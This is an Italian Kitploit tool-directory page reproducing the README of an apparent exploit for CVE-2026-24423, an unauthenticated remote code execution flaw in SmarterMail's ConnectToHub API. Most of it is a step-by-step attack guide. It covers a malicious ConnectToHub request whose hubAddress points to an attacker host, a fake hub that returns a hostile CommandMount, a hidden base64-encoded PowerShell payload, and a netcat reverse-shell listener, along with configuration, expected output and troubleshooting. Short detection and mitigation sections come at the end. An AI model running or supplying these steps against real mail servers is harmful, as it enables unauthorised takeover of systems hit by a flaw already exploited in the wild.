Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SmarterMail-CVE-2026-24423- — Exploit per CVE-2026-24423 — una RCE critica non autenticata nell'API ConnectToHub di SmarterMail. Interessa tutte le build precedenti alla 9511. | Kitploit
Strumenti/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423-
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubcyberalp0/smartermail-cve-2026-24423-

SmarterMail-CVE-2026-24423-

Exploit per CVE-2026-24423 — una RCE critica non autenticata nell'API ConnectToHub di SmarterMail. Interessa tutte le build precedenti alla 9511.

Vedi Repository
14h 53m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SmarterMail ConnectToHub RCE

Un exploit basato su Python per CVE-2026-24423, una vulnerabilità di Remote Code Execution non autenticata nella funzionalità ConnectToHub di SmarterTools SmarterMail.

Uso previsto: Solo test di sicurezza autorizzati, CTF, laboratori Hack The Box e ambienti di ricerca controllati.


Indice

  • Panoramica
  • Dettagli CVE
  • Versioni Affette
  • Descrizione della Vulnerabilità
  • Dettagli Tecnici
  • Flusso di Sfruttamento
  • Requisiti
  • Configurazione
  • Utilizzo
  • Output Previsto
  • Risoluzione dei Problemi
  • Screenshot
  • Struttura del Progetto
  • Mitigazione
  • Riferimenti
  • Disclaimer

Panoramica

CVE-2026-24423 è una vulnerabilità di Remote Code Execution non autenticata che colpisce SmarterTools SmarterMail.

La vulnerabilità esiste nella funzionalità ConnectToHub. Un attaccante non autenticato può fornire un hubAddress malevolo, causando una richiesta HTTP dal server SmarterMail verso un server controllato dall'attaccante.

Il server malevolo risponde con una risposta setup-initial-connection appositamente costruita contenente un valore SystemMount.CommandMount controllato.

L'istanza SmarterMail vulnerabile elabora successivamente questo valore come comando del sistema operativo, consentendo l'esecuzione arbitraria di comandi nel contesto di sicurezza del servizio SmarterMail.

Alla vulnerabilità è stato assegnato un punteggio CVSS 4.0 di 9.3 (Critico) ed è classificata come CWE-306: Mancanza di Autenticazione per Funzioni Critiche.


Dettagli CVE

CampoValore
CVECVE-2026-24423
VendorSmarterTools
ProdottoSmarterMail
VulnerabilitàRemote Code Execution non autenticata
CWECWE-306
CVSS v4.09.3 Critico
CVSS v3.19.8 Critico
Vettore di AttaccoRete
AutenticazioneNessuna
Interazione UtenteNessuna
ComplessitàBassa
Pubblicazione23 gennaio 2026
Build Correttiva9511

Il record CVE ufficiale descrive il problema come una RCE non autenticata attraverso il metodo API ConnectToHub.


Versioni Affette

Le versioni di SmarterMail precedenti alla Build 9511 sono affette.

Il record CVE specifica l'intervallo affetto come:

root@kitploit:~
SmarterMail < 100.0.9511

La Build 9511, rilasciata il 15 gennaio 2026, contiene la correzione del vendor.

Vulnerabili

root@kitploit:~
< 100.0.9511

Corrette

root@kitploit:~
>= 100.0.9511

Verificare sempre la build esatta installata prima di tentare di riprodurre la vulnerabilità.


Descrizione della Vulnerabilità

La funzionalità vulnerabile è esposta tramite l'API di amministrazione di sistema di SmarterMail.

L'operazione rilevante è:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

L'endpoint accetta un parametro hubAddress.

Concettualmente, un attaccante può fornire:

root@kitploit:~
{
    "hubAddress": "http://ATTACKER_IP:8081",
    "oneTimePassword": "temporary-value",
    "nodeName": "DC"
}

SmarterMail si connette quindi all'indirizzo hub fornito e richiede:

root@kitploit:~
/web/api/node-management/setup-initial-connection

Il server controllato dall'attaccante risponde con JSON contenente un oggetto SystemMount malevolo.

La proprietà importante è:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

Il valore CommandMount viene successivamente utilizzato dall'applicazione vulnerabile come comando del sistema operativo.

Ciò consente a un attaccante di passare da:

root@kitploit:~
Richiesta HTTP non autenticata

a:

root@kitploit:~
Esecuzione remota di comandi

L'analisi tecnica di VulnCheck conferma che l'hubAddress controllato dall'attaccante induce SmarterMail a richiedere l'endpoint setup-initial-connection dell'attaccante e che il CommandMount restituito può fornire l'esecuzione arbitraria di comandi.


Dettagli Tecnici

L'exploit è composto da due componenti:

1. Fake SmarterMail Hub

Il server Python è in ascolto per:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

e restituisce una risposta JSON appositamente costruita contenente il SystemMount.CommandMount malevolo.

2. Listener Reverse Shell

Un listener TCP separato riceve la connessione avviata dal comando eseguito sul target.

Questo exploit utilizza intenzionalmente due porte separate.

root@kitploit:~
8081
└── Fake SmarterMail Hub

4455
└── Listener Reverse Shell

Flusso di Sfruttamento

root@kitploit:~
flowchart LR

    A[Attaccante<br/>10.10.14.50]

    H[Fake SmarterMail Hub<br/>TCP/8081]

    T[Target SmarterMail<br/>10.129.57.86]

    C[CommandMount<br/>Esecuzione Comando]

    P[PowerShell]

    L[Listener Reverse Shell<br/>TCP/4455]

    A -->|Attiva ConnectToHub| T
    T -->|HTTP POST| H
    H -->|JSON Malevolo| T
    T -->|CommandMount| C
    C --> P
    P -->|TCP inverso| L
    L --> A

Connessione 1 — Fake Hub

root@kitploit:~
Target
   |
   | HTTP
   v
10.10.14.50:8081

Connessione 2 — Reverse Shell

root@kitploit:~
Target
   |
   | TCP
   v
10.10.14.50:4455

Queste porte servono a scopi diversi e non devono essere confuse.


Requisiti

  • Python 3
  • Macchina attaccante Linux
  • VPN Hack The Box o rete autorizzata equivalente
  • Connettività di rete dal target all'attaccante
  • Netcat
  • Installazione SmarterMail vulnerabile

L'exploit utilizza solo moduli della libreria standard di Python:

root@kitploit:~
http.server
json
base64

Non sono richiesti pacchetti Python esterni.


Configurazione

Modificare le seguenti variabili:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

Per l'ambiente HTB di esempio:

root@kitploit:~
LHOST     = 10.10.14.50
LPORT     = 4455
HUB_PORT  = 8081

LHOST

LHOST è l'indirizzo IP dell'attaccante raggiungibile dal target.

Per Hack The Box, questo è normalmente l'IP assegnato all'interfaccia VPN HTB:

root@kitploit:~
ip addr show tun0

Esempio:

root@kitploit:~
tun0:
    inet 10.10.14.50

Pertanto:

root@kitploit:~
LHOST = "10.10.14.50"

LPORT

LPORT è la porta TCP utilizzata dall'attaccante per ricevere la connessione inversa.

Esempio:

root@kitploit:~
LPORT = 4455

HUB_PORT

HUB_PORT è la porta HTTP utilizzata dall'hub SmarterMail malevolo.

Esempio:

root@kitploit:~
HUB_PORT = 8081

Utilizzo

1. Clonare il repository

root@kitploit:~
git clone https://github.com/<username>/<repository>.git
cd <repository>

2. Configurare l'exploit

Modificare:

root@kitploit:~
nano exploit.py

Impostare:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

3. Avviare il listener reverse-shell

Aprire un terminale:

root@kitploit:~
nc -lvnp 4455

Output previsto:

root@kitploit:~
Listening on 0.0.0.0 4455

Mantenere questo terminale aperto.


4. Avviare l'hub malevolo

Aprire un secondo terminale:

root@kitploit:~
python3 exploit.py

Se il binding alla porta selezionata richiede privilegi elevati:

root@kitploit:~
sudo python3 exploit.py

Output previsto:

root@kitploit:~
============================================================
 SmarterMail fake hub
============================================================
[+] LHOST:      10.10.14.50
[+] LPORT:      4455
[+] HUB:        10.10.14.50:8081

[+] In attesa di SmarterMail...
============================================================

5. Attivare ConnectToHub

Inviare la richiesta appropriata all'istanza SmarterMail vulnerabile.

L'hubAddress fornito deve puntare al server HTTP malevolo:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081",
    "oneTimePassword": "tempst",
    "nodeName": "DC"
}

Il valore importante è:

root@kitploit:~
http://10.10.14.50:8081

Non utilizzare la porta reverse-shell come porta hub.


Riepilogo Configurazione Porte

ScopoIPPorta
VPN Attaccante10.10.14.50—
Fake SmarterMail Hub10.10.14.508081
Reverse Shell10.10.14.504455
Target HTB10.129.57.86—

Il flusso risultante è:

root@kitploit:~
hubAddress
    ↓
10.10.14.50:8081
    ↓
CommandMount malevolo
    ↓
PowerShell
    ↓
10.10.14.50:4455

Codifica del Payload

L'exploit crea dinamicamente il payload PowerShell.

Il parametro -EncodedCommand di PowerShell prevede che il comando sia codificato in UTF-16LE prima della codifica Base64.

Lo script esegue:

root@kitploit:~
encoded = base64.b64encode(
    PS.encode("utf-16le")
).decode()

Il comando finale è strutturato come:

root@kitploit:~
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>

Questo evita la codifica manuale del payload e previene i comuni errori di codifica UTF-8/UTF-16LE.


Output Previsto

Quando il target raggiunge l'hub malevolo:

root@kitploit:~
[+] Ricevuta connessione SmarterMail
[+] Percorso: /web/api/node-management/setup-initial-connection
[+] Corpo: ...
[+] Invio payload CommandMount
[+] Reverse shell -> 10.10.14.50:4455

Il listener reverse-shell dovrebbe successivamente ricevere una connessione:

root@kitploit:~
Connection received on 10.129.57.86 XXXXX

Una volta connessi, è possibile eseguire una validazione di base:

root@kitploit:~
whoami
root@kitploit:~
hostname

Risoluzione dei Problemi

Il fake hub non riceve connessioni

Verificare che il server sia in ascolto:

root@kitploit:~
ss -lntp | grep 8081

Verificare l'indirizzo VPN:

root@kitploit:~
ip addr show tun0

Confermare che LHOST corrisponda all'indirizzo raggiungibile dal target.


Il fake hub riceve HTTP 200 ma nessuna shell

Una richiesta HTTP riuscita significa che la prima fase funziona:

root@kitploit:~
Target
  |
  | HTTP
  v
Fake Hub :8081

Non significa necessariamente che la seconda fase sia riuscita.

Verificare:

root@kitploit:~
ss -lntp | grep 4455

Assicurarsi che Netcat sia stato avviato prima di attivare l'exploit.

Verificare anche:

root@kitploit:~
LHOST = IP attaccante raggiungibile dal target
LPORT = porta del listener

Netcat riceve la richiesta HTTP invece di una shell

Se si vede:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

all'interno di Netcat, si è puntato hubAddress al listener reverse-shell.

Errato:

root@kitploit:~
hubAddress = http://10.10.14.50:4455

Corretto:

root@kitploit:~
hubAddress = http://10.10.14.50:8081

Le due porte devono rimanere separate.


Risposta HTTP 400

Una risposta 400 può verificarsi quando il fake hub non restituisce la struttura prevista da SmarterMail.

Verificare che la risposta contenga:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

Assicurarsi inoltre che il percorso richiesto sia esattamente:

root@kitploit:~
/web/api/node-management/setup-initial-connection

L'analisi pubblica della vulnerabilità identifica questo endpoint come parte del flusso ConnectToHub vulnerabile.


Screenshot

Aggiungere qui gli screenshot del laboratorio HTB.

1. Enumerazione del Target

Esempio:

root@kitploit:~
![Enumerazione Nmap](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/nmap.png)

Screenshot suggeriti:

  • Risultati Nmap
  • Servizio/versione SmarterMail
  • Porta esposta rilevante

2. Hub Malevolo

root@kitploit:~
![Fake Hub](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/fake-hub.png)

Mostrare:

root@kitploit:~
[+] Ricevuta connessione SmarterMail
[+] Invio payload CommandMount

3. Attivazione dell'Exploit

root@kitploit:~
![Richiesta Burp](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/burp-request.png)

Mostrare la richiesta contenente:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081"
}

4. Reverse Shell

root@kitploit:~
![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/reverse-shell.png)

Mostrare:

root@kitploit:~
Connection received on 10.129.57.86

e il prompt dei comandi risultante.


Struttura del Progetto

root@kitploit:~
smartermail-rce/
│
├── exploit.py
├── README.md
│
└── screenshots/
    ├── nmap.png
    ├── burp-request.png
    ├── fake-hub.png
    └── reverse-shell.png

Rilevamento

Potenziali indicatori di sfruttamento includono richieste inattese a:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

e connessioni in uscita dal server SmarterMail verso host HTTP precedentemente sconosciuti.

Gli amministratori dovrebbero inoltre esaminare i log applicativi, IIS/reverse-proxy e di rete per attività ConnectToHub sospette.

CVE-2026-24423 è stata inclusa nel catalogo Known Exploited Vulnerabilities di CISA, indicando che lo sfruttamento è stato osservato al di fuori degli ambienti di laboratorio.


Mitigazione

La remediation principale consiste nell'aggiornare SmarterMail alla Build 9511 o successiva. Il rilascio del vendor del 15 gennaio 2026 ha risolto la vulnerabilità.

Laddove il patching immediato non sia possibile, le organizzazioni dovrebbero inoltre considerare:

  • Limitare l'accesso alle API amministrative di SmarterMail.
  • Prevenire l'accesso esterno non necessario agli endpoint di gestione.
  • Applicare la segmentazione di rete.
  • Monitorare le connessioni in uscita dal server SmarterMail.
  • Esaminare i log storici per richieste ConnectToHub sospette.
  • Indagare sull'esecuzione inattesa di comandi da parte dell'account di servizio SmarterMail.

Riferimenti

  • Record CVE: CVE-2026-24423
  • VulnCheck: SmarterMail ConnectToHub RCE non autenticata
  • CODE WHITE: Elenco Pubblico delle Vulnerabilità
  • Note di rilascio SmarterTools SmarterMail
  • Catalogo Known Exploited Vulnerabilities di CISA

Disclaimer

Questo progetto è fornito esclusivamente per ricerca sulla sicurezza autorizzata e scopi educativi.

Non utilizzare questo exploit contro sistemi che non si possiedono o per i quali non si dispone di esplicita autorizzazione al test.

L'autore non si assume alcuna responsabilità per uso improprio, danni, perdita di dati, accesso non autorizzato o altre conseguenze derivanti dall'uso di questo software.

Utilizzare solo in ambienti controllati come:

  • Hack The Box
  • Competizioni Capture-the-Flag
  • Laboratori personali
  • Test di penetrazione autorizzati
  • Ambienti di ricerca sulla sicurezza

Crediti

CVE-2026-24423 è stata attribuita a:

  • Sina Kheirkhah
  • Piotr Bazydlo
  • Markus Wulftange
  • Cale Black

La CVE è stata pubblicata da VulnCheck il 23 gennaio 2026.

Scarica lo strumento